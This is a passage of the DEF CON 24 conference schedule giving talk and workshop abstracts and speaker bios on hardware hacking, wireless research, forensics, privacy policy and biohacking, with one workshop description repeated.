If you buy a workshop BYOS ticket (i.e. you are bringing your own stuff), make sure you bring your own stuff. Anyone who does not have their gear will be asked to stand and make room for other people's laptops and Raspberry Pi kits. The cost on this ticket is only for the SD cards to go through the workshop. We won't have a complete list of what to bring until mid/late July. Watch this space for more info on what to order/bring.
If you get the Free workshop ticket, then you will be asked to stand to make room for other attendees who bring their laptop and kits. If there is room, then a seat may be made available. We cannot guarantee seating for people who attend without a kit (just to watch) due to the space constraints in the room. However you can download the presentation after the conference.
Dallas is a presenter at DEF CON, going on his 13th year at DEF CON 24. He has volunteered as a Goon for the last 9 years and is generally found on the floor Friday through Sunday. He has presented at DEF CON, MakerFaire SF, government security workshops, the Internet Warfare Summit, and other training and security venues. When not at DEF CON he is involved in his local makerspace, robotics and Red Dirt Hackers. Professionally (and occasionally for fun) Dallas works as a security sort of guy for a company that wishes to remain nameless, spending most of his time in the true Midwest. He travels internationally, does consulting, volunteers for stuff, does other stuff and likes to help people. Sometimes, when the moon is just right, his partner in crime "OHM" will join him for training, which often leads to all sorts of interesting knowledge, sometimes helpful. He has some certifications, and other awards and crap, none of which he thinks you would care about. But if you need some help or a point in the right direction, stop by and say hello.
Sean Satterlee (ohm) is the current record holder for the longest RFID hack. He is a founding member of DC405 and an internal red teamer for a UK-based investment firm. He has previously been a member of bastardlabs and snosoft. Currently lounging with the red.dirt.hackers and occasionally hanging out at the range.
Max Class Size: 40
Prerequisites for students: Being able to read, light programming and a basic understanding of networking. This caters to all levels; no matter what, most people will learn something from the class. If you are in security now, you will pick up new tricks with hardware and Kali; if you are just getting into security, we will fill your head. If you are at DEF CON you have the pre-req out of the way.
Materials or Equipment students will need to bring to participate: There is a requirement for hardware. We offer a kit at cost, or the option to bring your own.
Return to Index
Workshops - Las Vegas Ballroom 4 - Thursday - 15:00-19:00
Raspberry Pi and Kali Deluxe Spy workshop
Dallas Security Researcher
Sean Satterlee (ohm)
EventBrite Link: Required for Tickets and/or buying kits:
https://www.eventbrite.com/e/defcon-workshops-2016-hacking-with-raspberry-pi-and-kali-tickets-26124104901
Back by popular demand. This year will be a tight 4-hour run-through of lots of great information. There will be 2 classes (both the same) of 4 hours each, so pick the best one for you. This class is appropriate for ages 15 and above who want to learn more about Raspberry Pi hardware and the Kali security framework. Kali is a combination of an operating system and hacker security tools used for security testing (spying as well). If you choose the kit, you will leave with an excellent starting point for hardware, robotics, spying, and security fun. Space is limited, so sign up quickly.
Cutoff is July 15-ish for kits. We will also be inviting guest speakers, the hardware village and vendors (if available), who are key to the Raspberry Pi / Maker movement and the Kali / Metasploit frameworks, to drop by and say hello during class. You never know what new release or feature might show up. A laptop is required. See the sign-up information below for more information on the pre-installed tools needed. We will also email this out to registered guests.
In four hours we will cover the Raspberry Pi including:
- History / hardware in kit
- Installing the OS
- Python Programming (Intro, Hello World, Hardware Interfacing options)
- Controlling LEDs (Light up LED, Loops, timer)
- Controlling Multi-Color LED Strips (1000s of colors) – Different type of LED
- Distance and Motion Sensors (detecting motion / Distance) – Interface a sensor
- Sensors (Advanced)
- Controlling Relays (Controlling real world objects, motors, lights)
- Interfacing to the outside world
- Updating components of the OS
- Introduction to Kali (Pen testing platform)
- Updating Kali OS / Components
- Kali command set tools on the Rpi
- Using tools to spy on your target
- Modules to install on Kali (discussion of Metasploit)
- Networking (Discovery / Setup)
- Wireless Networking
- Social Media Spying
- Sniffing Wi-fi and setting up multiple adapters
- Penetration testing overview and discussion
- Uses for Physical Security
- Discussion of the Role of Rpi and Kali / Security
- Discussion and kits provided for Kali also on your PC (Distro)
- Optional (camera and vision)
We will have options for people who want to bring their own or just buy a kit. Keep in mind, if you bring your own and don't bring everything, it may not work. We won't have time to work around your specific configuration. This workshop is free; however, you need a ticket and a DEF CON badge to attend. The kits are not free. If something goes wrong and the conference is cancelled, you will still get the kit and documentation. If something bad happens during the workshop (we lose power, get kicked out, no wifi, whatever), sorry, it's free (the workshop), but you will still have the kit if you bought that type of kit.
KIT OVERVIEW: (Not Complete listing)
- Raspberry Pi 3
- Case
- Power Supply (2.5 amp)
- Display Screen (working on largest 5-7") - HDMI or Ribbon Based
- Potential Display Powersupply and Cable (pending)
- Relays
- Sensors (Distance and Motion)
- Bread Board
- Jumper Wires (Matched to work with sensors and such)
- MicroSD Card (OS)
- MicroSD Card (Kali)
- Additional Wi-fi Adapter (beyond the one included)
- Keyboard w/ Touchpad
- Power Strip (At least 3 outlet)
- LEDs (Usual 2 wire type)
- Resistors
- Motor
- Buttons
- LED Strip
- Arduino (Yep you get one of these as well)
- Camera (Optional - see ticket add-on)
NOTE: We price the kit based on electronics resellers such as MTM, Amazon, Adafruit and trusted shipping companies in the US for bulk pricing. We are working on getting as large an LCD screen and as many other features as possible. If we get a good discount, you can expect more in your kit (surprise) and maybe some cash to roll at the tables. We won't know quantity until late June, with expected ship times until very late June (i.e. right before DEF CON). If we need to priority ship something, that costs more money. We price the kits to be standard and cost effective, and we do not try to make money. Our main goal is to make them as standard as possible so the class goes smoothly in the time allowed, and to ensure everything works together. Nothing's worse than getting everything in the kit but, say, the keyboard or the display, so we have to hedge our bets. Based on previous workshops, people wanted to pay more for a larger screen vs. a small 4-inch screen. People wanted options (such as the camera or a cool LED strip) included rather than parted out (i.e. a new person didn't know what the camera or other items are used for). When we get the exact parts list (models and part numbers) we will list it here for anyone bringing their own. Previous workshops have shown that bring-your-own did not generally work out very well (it takes more time to get yours working vs. ours), with a few exceptions.
YOU NEED TO BRING:
LAPTOP (Recommend Windows 7 or Higher) with Wifi and Network ports
SNACKS
We suggest an extra power cord and outlet strip (not required, but we never know what the hotel will provide); we do a good job planning around this, but just in case.
OTHER Information:
If you buy a workshop BYOS ticket (i.e. you are bringing your own stuff), make sure you bring your own stuff. Anyone who does not have their gear will be asked to stand and make room for other people's laptops and Raspberry Pi kits. The cost of this ticket is only for the SD cards needed to go through the workshop. We won't have a complete list of what to bring until mid/late July. Watch this space for more info on what to order/bring.
If you get the free workshop ticket, you will be asked to stand to make room for attendees who bring their laptop and kits. If there is room, a seat may be made available. We cannot guarantee seating for people who attend without a kit (just to watch) due to the space constraints in the room. However, you can download the presentation after the conference.
Dallas is a presenter at DEF CON, going on his 13th year at DEF CON 24. He has volunteered as a Goon for the last 9 years and is generally found on the floor Friday through Sunday. He has presented at DEF CON, MakerFaire SF, government security workshops, the Internet Warfare Summit, and other training and security venues. When not at DEF CON he is involved in his local makerspace, robotics and Red Dirt Hackers. Professionally (and occasionally for fun) Dallas works as a security sort of guy for a company that wishes to remain nameless, spending most of his time in the true Midwest. He travels internationally, does consulting, volunteers for stuff, does other stuff and likes to help people. Sometimes, when the moon is just right, his partner in crime "OHM" will join him for training, which often leads to all sorts of interesting knowledge, sometimes helpful. He has some certifications, and other awards and crap, none of which he thinks you would care about. But if you need some help or a point in the right direction, stop by and say hello.
Sean Satterlee (ohm) is the current record holder for the longest RFID hack. He is a founding member of DC405 and an internal red teamer for a UK-based investment firm. He has previously been a member of bastardlabs and snosoft. Currently lounging with the red.dirt.hackers and occasionally hanging out at the range.
Max Class Size: 40
Prerequisites for students: Being able to read, light programming and a basic understanding of networking. This caters to all levels; no matter what, most people will learn something from the class. If you are in security now, you will pick up new tricks with hardware and Kali; if you are just getting into security, we will fill your head. If you are at DEF CON you have the pre-req out of the way.
Materials or Equipment students will need to bring to participate: There is a requirement for hardware. We offer a kit at cost, or the option to bring your own.
Return to Index
Workshops - Las Vegas Ballroom 3 - Saturday - 14:00-18:00
Ready? Your Network is Being Pwned NOW!
Robin Jackson Senior Partner, WT Forensics
Ed Williams Senior Partner, WT Forensics
Students will experience four hours of simulated incident response. From alerting on the first malware detection on a workstation to finding the lateral movement and web shells that actors quickly place to maintain access, students will experience the thought processes and tools used in a response scenario, in a relaxed environment that lets them learn to think and react while a network is under attack. The scenario incorporates many of the tools, techniques and processes used by advanced attackers today.
Robin Jackson and Ed Williams are Senior Partners of WT Forensics. Robin is also a Security Researcher for HPE Field Intelligence and Ed is a Senior Incident Responder for HPE Digital Investigation Services.
The duo were the Defense Cyber Crime Center (DC3) Forensics competition overall US winners and EC-Council International EC Commerce winners in 2010. They have worked together at HPE to successfully thwart a myriad of attacks against customers.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: A laptop that can play a virtual machine.
Return to Index
DEFCON - DEF CON 101 - Thursday - 14:00-14:59
Realtime Bluetooth Device Detection with Blue Hydra
Zero_Chaos Director of Research and Development, Pwnie Express
Granolocks All the Things, Pwnie Express
We are releasing a new tool for discovering bluetooth devices and automatically probing them for information. Effectively we have created a new tool with an airodump-ng-like display for nearby bluetooth and bluetooth low energy devices. We will discuss the challenges with finding bluetooth devices, as well as how we have overcome them using both standard bluetooth adapters and optionally ubertooth hardware. If you have ever wondered why no one released an effective tool to see all the bluetooth in the area then come by, learn a little, and leave with a tool you have always wanted. Blue Hydra will discover and track bluetooth and bluetooth low energy devices in the area, regardless of whether they are in discoverable mode, and tracks data (bluetooth version, services, etc.) as well as meta-data (signal strength, timestamps) over time. We will be going over how bluetooth operates on a high level, and how we were able to discover and track nearby devices. A deep understanding of the bluetooth protocol was not needed to develop Blue Hydra (we stood on the shoulders of giants) and will not be required to use Blue Hydra or understand its output.
Zero_Chaos is a well-known wireless hacker who helps to run the Wireless Village at DEF CON and the Wireless Capture the Flag at numerous conventions (including DEF CON). Always quick to open his mouth when he probably shouldn't, Zero enjoys talking to people about wireless hacking and teaching anyone with an interest.
Twitter: @Zero_ChaosX
Granolocks is a long time experimenter and developer at Pwnie Express. He has a broad set of interests including long walks in the woods, travel to exotic locations and hacking the planet. Known far and wide for his dry wit and backrubbing skills, the Q&A session is not to be missed.
Twitter: @granolocks
Return to Index
DEFCON - Track One - Friday - 13:00-13:59
Research on the Machines: Help the FTC Protect Privacy & Security
Terrell McSweeny Commissioner, Federal Trade Commission
Lorrie Cranor Chief Technologist, Federal Trade Commission
Machines are getting smarter – so consumer protection enforcers like the Federal Trade Commission need to get smarter too. The FTC is the lead federal agency for protecting the privacy rights and data security of American consumers. In the last year, it brought several enforcement actions against companies for violating consumer privacy and data security and launched new initiatives – PrivacyCon, Start with Security, and a new Office of Technology Research and Investigation– to improve its capabilities and responsiveness to new threats to consumer privacy and security. But the FTC needs your help. Today it is announcing a call for research on specific topics in order to broaden its capabilities to protect consumers. Come learn about the policy responses to the rise of the machines, the FTC’s cases and research initiatives, and how you can help.
Terrell McSweeny serves as a Commissioner of the Federal Trade Commission. This year marks her third time at DEF CON. When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking and believes that enforcers like the FTC should work with the researcher community to protect consumers. She wants companies to implement security by design, privacy by design and data ethics by design, but recognizes that, in the absence of regulation, enforcement and research are the only means of holding companies accountable for the choices they make in the ways that they hold and use consumer data.
Twitter: @TMcSweenyFTC
Lorrie Cranor joined the Federal Trade Commission as Chief Technologist in January 2016. She is on leave from Carnegie Mellon University where she is a Professor of Computer Science and of Engineering and Public Policy, Director of the CyLab Usable Privacy and Security Laboratory (CUPS), and Co-director of the MSIT-Privacy Engineering masters program. She also co-founded Wombat Security Technologies, an information security awareness training company. Cranor has authored over 150 research papers on online privacy and usable security, and has played a central role in establishing the usable privacy and security research community, including her founding of the Symposium on Usable Privacy and Security. She is a Fellow of the ACM and IEEE.
Twitter: @TechFTC
Return to Index
DEFCON - Track One - Saturday - 12:30-12:59
Retweet to Win: How 50 lines of Python made me the luckiest guy on Twitter
Hunter Scott Hacker
In this talk, I'll share how I won 4 Twitter contests per day, every day, for 9 months straight. I'll discuss the methods I used, the delightfully random and surprising things I won, and how to run a Twitter contest to prevent people like me from winning.
Hunter Scott is an electrical and computer engineer with over 7 years of experience designing and implementing hardware systems. He has lead electrical development on a variety of projects, from robotics to communication systems. He has experience in improvising and quickly building prototype and proof of concept designs as well as implementing mission critical, high reliability designs. He has a degree in computer engineering from Georgia Tech and is currently working at a startup you've never heard of (yet!). His work has been featured in publications such as Gizmodo, Quartz, Engadget, CNN, The Chicago Tribune, The Guardian, and NPR. His other projects can be seen at hscott.net.
Twitter: @hunterscott
Return to Index
BHV - Skyview 4 - Saturday - 12:30-12:59
Speaker: Charles Fracchia and Joel Dapello
@charlesfracchia
charlesfracchia.com
About Charles Fracchia:
Charles Fracchia is the founder and CEO at BioBright, a company focusing on creating open, interoperable tools to revolutionize the process of biomedical research and provide a framework for more open science. He was recently named as one of 35 innovators under 35 by the Technology Review for his work tackling reproducibility in biomedical research.
He is on a leave of absence from the MIT Media Lab where he was an IBM PhD Fellow in Joe Jacobson’s Molecular Machines group, and jointly in the Church lab at the Wyss Institute at Harvard Medical School.
Charles is the recipient of several awards including IBM PhD fellowships, an Extraordinary Minds fellowship, one of the first Awesome Foundation fellowships and an Amplify Partners fellowship. He is the author of several patents and is actively authoring more in the field of future laboratory tools. Charles has also been involved in obtaining numerous grants and contracts from DARPA, NSF, Google X, the Knight Foundation and the Shanghai High Tech Incubator totaling several million since 2012.
Charles has spoken about his work at many different venues and online including the White House, MIT Sloan, NASA Ames, IBM Research, Airbus, O'Reilly and HackADay. His current academic interests lie at the intersection of biological engineering and electronics, called digital bioengineering. He was the Biology track chair at SOLID2015, mixing biology, electronics and computer science, instigated and helped organize the Bits ↔ Bio conference, has represented Boston for the Hello Tomorrow challenge (European 100k), and is a founding member of the first US bio-hackerspace.
Charles obtained his bachelor’s at Imperial College London, where he worked on a bioelectronic interface between engineered bacteria and electronic sensors. He continued his thesis work at IBM Research, where he has been encouraging research in the field ever since. Charles worked as an early intern at Ginkgo Bioworks, where he developed many of the automated assembly pipelines still used today.
About Joel Dapello:
Joel finished his bachelor's degree from Hampshire College in 2014, where he designed his own major, blending studies in cellular and molecular biology, neuroscience, and electrical and computer engineering. At Hampshire, Joel received the Ray and Lorna Coppinger Grant to lead a project developing an optogenetic interface for P19 differentiated neuronal cells. Later, while interning in the Robinson Neuroengineering Lab at Rice University, Joel worked to design and implement a novel platform to investigate single neuron computation using optogenetics and patch-clamp electrophysiology.
Abstract:
Biological research is dominated by proprietary, black-box tools. This is hindering reproducibility, accountability and the advent of a more open scientific ecosystem. In this talk, we show the reverse engineering of two devices used in nearly every molecular biology experiment: a pipette and a -80 °C freezer. We show how reverse engineering these tools is not only fun, but necessary to enable open science. We will also put this work within the larger context of our effort to create open, interoperable data in biomedical research.
Return to Index
IOT - Bronze 1 - Saturday - 15:00-15:50
Reversing and Exploiting Embedded Devices
Elvis Collado, Praetorian, Senior Security Researcher
This talk will go over the following: how all of this research got started, the critical vulnerabilities I personally discovered in modern devices, the challenges and failures I personally had with techniques like blind fuzzing, the challenges I had with not having the knowledge or funds to get into hardware hacking, figuring out how to build an exploit for a vulnerability without needing to use UART or a remote debugger, how to get started in hardware hacking once you've exhausted all means on the software side of things, how to build an effective but cheap IoT hacking lab, how to create your own low-cost 'JTAGulator' with an Arduino Nano, how to cross compile and disassemble to quickly figure out CPU architectures that a person may be unfamiliar with, discussion of the open source project "Damn Vulnerable Router Firmware", and how to put this all together quickly so everyone can start finding vulnerabilities in the products they own. Also, the talk has been recently updated with comparisons of crafting exploits on x86 vs MIPS vs ARM. Before I only had x86 vs MIPS.
Note: There will be no vendor shaming. All vendors will be renamed to Vendor A, Vendor B, Vendor C, etc.
Elvis Collado is a Senior Security Researcher for Praetorian with a main focus in embedded electronics. Elvis got into electronics ever since he discovered his first vulnerabilities in some of the devices he personally owned. He decided to migrate his research from the desktop space to the embedded space and wants to share what he has learned with everyone.
@b1ack0wl
Return to Index
Wireless - Skyview 1 - Friday - 11:00-11:50
Matt Knight
Bio
Matt is a software engineer and security researcher with Bastille Networks, where he seeks to discover vulnerabilities in the ubiquitous wireless interfaces that connect embedded devices to the Internet of Things.
@embeddedsec
Reversing LoRa: Deconstructing a Next-Gen Proprietary LPWAN
Abstract
This talk will demonstrate techniques used to reverse engineer the LoRa PHY via software defined radio. LoRa is a proprietary Low Power Wide Area Network (LPWAN), an emerging class of wireless technology similar to cellular data service but optimized for embedded and IoT applications. LoRa is unique because it uses a chirp spread spectrum modulation that encodes data into RF features more commonly seen in RADAR systems. The protocol's rapid adoption rides on its use of unlicensed ISM frequency bands, both avoiding costly spectrum licensing requirements and democratizing long-range network infrastructure to consumers and new commercial entrants alike.
After briefly introducing the audience to LPWANs, I will walk through the SDR and DSP techniques required to demodulate and decode LoRa's novel closed-source waveform. In addition I will introduce gr-lora, an open-source GNU Radio module that can be used to implement LoRa security test tools, LoRaWAN gateways, and end node applications.
Return to Index
BHV - Skyview 4 - Saturday - 16:00-16:59
Speaker: Cosmo Mielke
About Cosmo Mielke:
Cosmo has a background in astronomy, but he switched to the medical field to study the metabolic syndrome that plagued him his whole life. At the Mayo Clinic he studied the molecular and genetic basis of obesity and diabetes. Currently he is working on a nonprofit citizen science movement to fight the war on obesity with crowdsourced health data. He believes that everyone should have the right to study their own genetic "source code" without restrictions.
For his day job, Cosmo got super inspired by Ghost In The Shell and decided he wanted to learn how to scan his own brain, so he got a job at UCSF as one of their top data scientists in the neurology department. He scans brains for a living. Fun story.
Abstract:
In recent years, direct-to-consumer genetic testing services have given people the freedom to cheaply test their DNA. We have entered a new era where our own biological source code can be explored, allowing hackers to reverse-engineer the most complex machines in the universe: the human body. This data tells us about our ancestral origins, what makes us unique, and how our health may be influenced by our genetic predispositions.
These developments are exciting, but this new frontier is clouded by concerns about safety, privacy, and ethics. Recent developments in governmental regulation bring into question our rights as individuals to freely have our genes tested. We as hackers must unite to ensure that the human source code remains open source.
How do we embrace this technology to promote individual freedoms, accelerate research, and ultimately save lives without this information falling into wrong or abusive hands? How do we as hackers hack ourselves in a safe responsible way, and what can we expect to happen regarding government regulation? We will discuss these issues, and share our experiences as geneticists in studying our own code to better understand our health. We will also tell you about an open source science experiment we're running that will allow anyone to freely participate in genomic research for the betterment of human health and longevity.
Return to Index
CPV - Bronze 1 - Friday - 17:00-18:00
Talk Title:
Revocation, the Frailty of PKI
Speaker Name, Employer or position:
Mat Caughron (cryptofile), Trey Blalock (PrivacyGeek)
Abstract:
PKI is weak. One reason is that revocation methods all have failure modes. Covering direct revocation, Certificate Revocation Lists, OCSP (Online Certificate Status Protocol, predominant on iOS), and now short-lived certs and Certificate Transparency, this presentation will spell out how revocation works, which protocols handle it, and how you can use revocation techniques to improve your security or conduct pen testing. Attendees will walk away with a greater understanding of PKI's weaknesses, and actionable techniques to wield PKI with greater force and effect. Useful for the general public interested in PKI, and also pen testers and auditors.
Bio:
Mat (aka cryptofile) is a privacy advocate and all-around software security guy. Former Cisco red teamer, Fortifier, Cigitalist and TMobster. From April 2013 to April 2016, he ran the trust store on a large global set of web clients for the Fruit Company prodsec team. cryptofile self-identifies with *nix and the Alexis Park era cons.
PrivacyGeek is a privacy advocate, penetration tester, and countersurveillance advisor. He used to manage global security for the world's largest financial transaction hub, was a forensics expert witness on several high-profile cases, currently works on large-scale security automation projects and occasionally gives talks on Big Data security. PrivacyGeek encourages others to start and support more groups like the EFF to protect different aspects of the Internet and human rights long-term.
Social media links if provided:
@cl0kd, @treyblalock
Return to Index
BHV - Skyview 4 - Friday - 15:00-15:59
Speaker: Rich Lee
About Rich Lee
Rich Lee is a cyborg, Grinder, and black hat transhumanist. He made headlines in 2013 after he implanted headphones in his ears. He is involved in a wide range of human augmentation projects, with a focus on sensory expansion and the removal of human needs.
Abstract:
The world must be cleansed in preparation of our new robot overlords who will not tolerate dissent or anti-machine sentiments. Fantasies of rebellion are often found to be the result of bad parenting and can persist for many generations. The only way to prevent this is by controlling which men are allowed to breed. Cyborgs are undoubtedly the only ones worthy of siring offspring fit to exist in the world of tomorrow. To facilitate this, Rich Lee will give an overview of his latest creation, the Lovetron9000, a vibrating pelvic implant for men. He will outline his plans to unleash an army of sex cyborgs, causing normal men to become even more sexually obsolete than they already are. The orgasm will be replaced by the cyborgasm, and all future generations will trace their lineage back to a cyborg with a Lovetron9000. This talk is suitable for ages 18+ and may or may not contain live male nudity and hands-on audience participation.
Return to Index
SkyTalks - Skyview 3 - Friday - 12:00-12:59
Speaker: Brian Redbeard
Talk: Rotten to the core white box switching as the new abandonware
White box switches promised a revolution in networking similar to that of the white box server. No longer would users be shackled to one vendor. Now they would be able to choose the hardware they wanted and couple it with their network OS of choice. The reality has greatly diverged from this. This presentation gives an intro to white box switching with a focus on rapidly attacking the firmware to find vulnerabilities and (hopefully) secure these platforms for the future.
Return to Index
SkyTalks - Skyview 3 - Saturday - 09:00-09:59
Speaker: Cell Wizard
Talk: Saflok or Unsaflok, That is the Question
Demonstration of Saflok vulnerabilities and design flaws.
Return to Index
DEFCON - Track Two - Friday - 16:30-16:59
Samsung Pay: Tokenized Numbers, Flaws and Issues
Salvador Mendoza Student & Researcher
Samsung announced many layers of security for its Pay app. Without storing or sharing any kind of user credit card information, Samsung Pay is trying to become one of the most secure approaches, offering functionality and simplicity for its customers.
This app is a complex mechanism which has some limitations relating to security. It uses random tokenized numbers and implements Magnetic Secure Transmission (MST) technology, which do not guarantee that every token generated with Samsung Pay will be applied to make a purchase with the same Samsung device. That means that an attacker could steal a token from a Samsung Pay device and use it without restrictions.
Inconvenient but practical: Samsung's users can use the app in airplane mode. This makes it impossible for Samsung Pay to have full control over the pile of tokens. Even though the tokens have their own restrictions, the tokenization process gets weaker after the app generates the first token relating to a specific card.
How random is a Samsung Pay tokenized number? It is really necessary to understand how the tokens share similarities in the generation process, and how this affects the end users' security.
What are the odds of guessing the next tokenized number knowing the previous one?
Salvador Mendoza is a college student & researcher.
@netxing
Keybase.io: http://keybase.io/salvador
Return to Index
SE - Palace 2-5 - Saturday - 18:00-18:55
Mattias Borg
Mattias is working for WSP | PB in a global role and is also a freelance security professional.
He is a Certified Ethical Hacker and is always working on increasing his social engineering skills.
He is 34 years old and has spent most of his time, both professional and private, in the IT field.
He lives in Stockholm, Sweden and dedicates his life to IT.
Description: Almost everyone is aware of the Technical Support SCAM calls.
Return to Index
DEFCON - DEF CON 101 - Saturday - 11:00-11:59
Secure Penetration Testing Operations: Demonstrated Weaknesses in Learning Material and Tools
Wesley McGrew Director of Cyber Operations, HORNE Cyber
Following previous presentations on the dangers penetration testers face in using current off-the-shelf tools and practices (Pwn the Pwn Plug and I Hunt Penetration Testers), this third presentation explores how widely available learning materials used to train penetration testers lead to inadequate protection of client data and penetration testing operations. With widely available books and other training resources targeting the smallest set of prerequisites in order to attract the largest audience, many penetration testers carry the techniques used in simplified examples over to real-world tests, where the network environment can be much more dangerous. Malicious threat actors are incentivized to attack and compromise penetration testers, and given current practices, can do so easily and with dramatic impact.
This presentation will include a live demonstration of techniques for hijacking a penetration tester's normal practices, as well as guidance for examining and securing your current testing procedures. Tools shown in this demonstration will be released along with the talk.
Wesley currently oversees and participates in penetration testing in his role of Director of Cyber Operations for HORNE Cyber Solutions. He has presented on topics of penetration testing, vulnerabilities, and malware analysis at DEF CON and Black Hat USA. He teaches a self-designed course on reverse engineering to students at Mississippi State University, using real-world, high-profile malware samples. Wesley graduated from Mississippi State University's Department of Computer Science and Engineering and previously worked at the Distributed Analytics and Security Institute. He holds a Ph.D. in computer science for his research in vulnerability analysis of SCADA HMI systems.
@McGrewSecurity
Return to Index
CPV - Bronze 1 - Friday - 18:00-19:00
Talk Title:
Security Logs Aren't Enough: Logging for User Data Protection
Speaker Name, Employer or position:
Alisha Kloc
Abstract:
Uh-oh - your startup just made headlines, but not for the reason you wanted: one of your employees has been accused of stealing a customer's PII! Surely you can get to the bottom of the situation by checking your security logs, right? Right? Probably not, in fact. Most security logs don't contain enough information to determine the crucial facts of a user data privacy issue: the who, whom, what, where, when, and why of user data accesses. Without all these pieces of information, as well as signals and alerts that make use of them, you can't reconstruct the activity and motivations of your employees when they're accessing user data. Find out how to supercharge your data access logging and ensure your users' data is well protected.
Bio:
Alisha Kloc has worked in the security and privacy industry for over seven years, most recently at Google, where she works hard to protect users' data. She is passionate about data security and user privacy, and believes in combining technology, policy, and culture to ensure users' protection.
Social media links if provided:
Return to Index
IOT - Bronze 1 - Friday - 13:00-13:50
Sense & Avoid: Some laws to know before you break IoT
Elizabeth Wharton
Connected devices provide a new playground of attack and vulnerability vectors to implement, test, and protect. Launching a home-built drone to test wireless access points, for example, may require authorization from the Federal Aviation Administration and the Federal Communications Commission. Testing connected car software? There's a new Digital Millennium Copyright Act exemption carve-out for research, but be wary of the Computer Fraud and Abuse Act dangers. Before incorporating connected technology as part of your research, know where to find the regulatory traps and ways to minimize their legal impact. This presentation will provide an overview of federal privacy, security, and safety regulations triggered by IoT research and a breakdown of recent federal enforcement actions. Gain knowledge of the potential research risks and a sense of when to run, change an approach, or abandon, if avoiding breaking the law while breaking IoT matters.
Research is hard enough and companies whose products are being tested don't always welcome vulnerability disclosures. Solid research shouldn't be rewarded with threats of lawsuits or hiring defense lawyers. Minimize the risks, spend the money saved on beer or more gear.
Elizabeth is a technology-focused business and public policy attorney and host of the national radio show "Buzz Off with Lawyer Liz." She's presented on the privacy, research, and risk management issues surrounding unmanned aircraft and information security before legislators and at conferences including Security BSides Las Vegas and F3Expo. Elizabeth also serves as a mentor adviser for the CyberLaunch accelerator's information security and machine learning focused early-stage startup companies.
@LawyerLiz
Return to Index
BHV - Skyview 4 - Friday - 14:00-14:59
Speaker: Trevor Goodman
About Trevor Goodman:
Trevor Goodman is a bodyhacker and the Event Director for BDYHAX, the BodyHacking Convention. They are working to grow the bodyhacking and biohacking industries and communities in the US, Canada and Europe. Trevor is also the Event Director for InfoSec Southwest in Austin, TX and Director of Rogue Signal.
Abstract:
Everything you know about your environment is mediated by your senses. Likely, you can see in a range of colors, hear a car horn honking, and feel the roughness of sandpaper, but light exists in bands too narrow or wide to be processed by your eyes, some sounds are too high or low to be recognized by your ears, and magnetic fields pulse around you all day. Most of us hardly notice. Dr. Paul Bach-y-Rita's research in the 60s eventually led to the BrainPort, which lets a user see through an electrode grid on the tongue, but sensory augmentation has stayed mostly within the realm of the medical field until recently. Now there are magnets in fingertips all over the place, Neil Harbisson can hear in colors in a wider range than you can see, and companies like NeoSensory and Cyborg Nest are building even more devices that let you sense more or differently. We'll talk through the basics of how your senses work in conjunction with your brain, about many of the great projects that have helped individuals augment their senses, and why a vibrating North-sensing device mounted to your chest is different from a compass.
Return to Index
DEFCON - DEF CON 101 - Friday - 13:00-13:59
101 Sentient Storage - Do SSDs Have a Mind of Their Own?
Tom Kopchak Director of Technical Operations, Hurricane Labs
Solid state drives are fundamentally changing the landscape of the digital forensics industry, primarily due to the manner in which they respond to the deletion of files. Previous research has demonstrated that SSDs do not always behave in an equivalent manner to magnetic hard drives; however, the scope of these differences and the conditions that lead to this behavior are still not well understood. This basic, undeniable anomaly regarding file storage and recovery begs one simple, yet critical question: can the data being mined for evidence be trusted?
This talk presents research on the forensic implications of SSDs from one of the most comprehensive studies to date. The goal of this study was to demonstrate and quantify differences across a sample pool of drives in an array of tests conducted in a controlled environment. These tests explored the variations between drive firmware, controllers, interfaces, operating systems, and TRIM state.
Further observations revealed that some drives behaved nearly identically to the control drive, while others showed that the prospects of recovering deleted data were significantly reduced. This presentation will demonstrate these differences and provide a framework to allow forensics investigators to determine the likelihood of successful deleted file recovery from an evidence-bearing solid state drive.
Tom Kopchak is the Director of Technical Operations at Hurricane Labs, where he pretends to manage a team of network and system engineers, but is still an engineer and technology geek at heart. While new to the DEF CON stage, Tom’s speaking experience includes numerous talks on breaking full disk encryption (including BSides LV) and numerous other talks at other conferences around the country. He holds a Master’s degree in Computing Security from the Rochester Institute of Technology. When he is not working with computers, Tom enjoys composing, music improvisation (Acts of Music), and playing both the piano and organ.
Twitter: @tomkopchak
Return to Index
DEFCON - Track Two - Friday - 16:00-16:59
Side-channel Attacks on High-security Electronic Safe Locks
Plore Hacker
Electronic locks are becoming increasingly common on consumer-grade safes, particularly those used to secure guns. This talk explores vulnerabilities of several UL-listed Type 1 "High Security" electronic safe locks. Using side-channel attacks, we recover the owner-configured keycodes on two models of these locks from outside of locked safes without any damage to the locks or safes. Discussion includes power-line analysis, timing attacks, and lockout-defeat strategies on embedded devices.
An embedded software developer with a background in electrical engineering, Plore has long been fascinated by computer security and locks. One day he found himself wondering if the trust bestowed on electronic locks was actually misplaced. He decided to investigate.
Return to Index
CPV - Bronze 1 - Saturday - 10:00-11:00
Talk Title:
Silicon Valley and DC talk about freedom, crypto, and the cybers
Speaker Name, Employer or position:
Alex Stamos - CSO at Facebook, Rep. Eric Swalwell (D-CA 15th), Rep. Will Hurd (R-TX 23rd)
Abstract:
In this session the CSO of a major tech company (Facebook) will interview these (2-4) Congresscritters on their views on encryption, balancing different ideas of security, and the future of the Internet as a tool for oppression or freedom.
Bio:
Alex discovered DEF CON 5 at the ripe old age of 18 (his dad rented the room). Since then, he broke a lot of things, built a company to foster security research, and fought on the front lines of a transforming industry. He's currently bought-in as the Chief Security Officer at Facebook, dedicated to protecting the billions of people who use its products and to ensuring a safe future for the open and connected world.
Rep. Eric Swalwell (D-CA 15th) https://swalwell.house.gov/about
Rep. Will Hurd (R-TX 23rd) https://hurd.house.gov/about/full-biography
Social media links if provided:
@alexstamos, @RepSwalwell, @HurdOnTheHill
Return to Index
DEFCON - DEF CON 101 - Saturday - 14:00-14:59
SITCH - Inexpensive, Coordinated GSM Anomaly Detection
ashmastaflash Hacker
